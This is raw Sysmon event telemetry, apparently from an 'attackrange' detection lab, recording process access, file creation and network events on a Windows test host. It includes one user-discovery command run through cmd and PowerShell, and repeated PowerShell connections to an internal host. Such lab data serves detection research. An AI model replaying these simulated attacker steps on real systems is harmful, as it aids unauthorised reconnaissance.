13:21:29.677{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-6639-6125-B100-01000000C801}6536C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+981b0|C:\Windows\System32\SHELL32.dll+b2aac|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498312Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:29.677{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-6639-6125-B100-01000000C801}6536C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b1604|C:\Windows\System32\SHELL32.dll+b2a80|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498311Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:29.677{B81B27B7-4133-611D-AB00-00000000C801}45644752C:\Windows\Explorer.EXE{B81B27B7-6639-6125-B100-01000000C801}6536C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000036498310Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:58.952{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50635-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498309Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:29.410{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE18A6884AD15920AF3871CE4AC569DB,SHA256=ADC3D4DE9F72439930658F0689E1514F89F3A0D1D3874A2846768DB0AE581973,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498319Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:30.424{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BA051C0E2B1860F59DE0DB58940318F,SHA256=C651BE8913922B05748F5B8D3AE107F4DBE9B9AE2841FA93E12BCDB6C209467F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498322Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:01.765{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50636-false10.0.1.12-8000- 23542300x800000000000000036498321Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:31.475{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D450FD53EAB02F4815CD319F67FE985,SHA256=C75AA64D564D0A0819729A112CBEC49FEC8F02278EFC124ED9A2D2325B455909,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498320Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:31.060{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\aborted-session-pingMD5=DF765D3D43969D20782733152ACD442E,SHA256=479B569C549225F2F14850645DC03864615BB6BBF066F208271210B68D301C37,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000036498326Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:02.964{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50637-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:32.625{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498324Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:32.523{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE461AFBEAF90E3E40BA007BC00AAC2D,SHA256=D69634E2539527F412D79D6C1F93445B61D50EAD379D65B6D83C9FFDB64E0DDE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:32.305{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E0BDE506901E67B32EBA72A6785258EC,SHA256=025C4D07F04BDC7576E9225FDB286ABA2D750785A03B8FC0AF3CD414332E413F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036498354Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.904{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=718F6B33793B4C1B91A5F173F60E5DA3,SHA256=D074A410D4ECF3F132439BF0041610ACD0F8201BF9CF71FC1176D237878BF22D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498353Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:22:04.294{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50638-false10.0.1.12-8089- 23542300x800000000000000036498352Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.227{B81B27B7-A1DD-6140-A856-04000000C801}5460ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498351Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:33.158{B81B27B7-4013-611D-1600-00000000C801}11962844C:\Windows\system32\svchost.exe{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498350Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.158{B81B27B7-4013-611D-1600-00000000C801}11961244C:\Windows\system32\svchost.exe{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498349Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:33.124{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498348Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.124{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
17141700x800000000000000036498347Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-CreatePipe2021-09-14 13:21:33.089{B81B27B7-A1DD-6140-A856-04000000C801}5460\PSHost.132760992930137387.5460.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000036498346Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.089{B81B27B7-A1DD-6140-A856-04000000C801}5460ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_ernoalt5.xuz.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498345Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.089{B81B27B7-A1DD-6140-A856-04000000C801}5460ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_dzvmnvt1.nph.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000036498344Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.073{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_dzvmnvt1.nph.ps12021-09-14 13:21:33.073 10341000x800000000000000036498343Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:33.058{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498342Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-6639-6125-B100-01000000C801}65365024C:\Windows\system32\conhost.exe{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498341Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:33.005{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498340Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498339Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:33.005{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498338Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498337Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:33.005{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498336Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-A1DD-6140-A756-04000000C801}56001380C:\Windows\system32\cmd.exe{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498335Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.013{B81B27B7-A1DD-6140-A856-04000000C801}5460C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe [System.Security.Principal.WindowsIdentity]::GetCurrent()C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{B81B27B7-A1DD-6140-A756-04000000C801}5600C:\Windows\System32\cmd.execmd.exe /c powershell.exe [System.Security.Principal.WindowsIdentity]::GetCurrent() 
10341000x800000000000000036498334Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-6639-6125-B100-01000000C801}65365024C:\Windows\system32\conhost.exe{B81B27B7-A1DD-6140-A756-04000000C801}5600C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498333Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498332Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:33.005{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498331Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498330Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:21:33.005{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498329Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:21:33.005{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-A1DD-6140-A756-04000000C801}5600C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498328Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 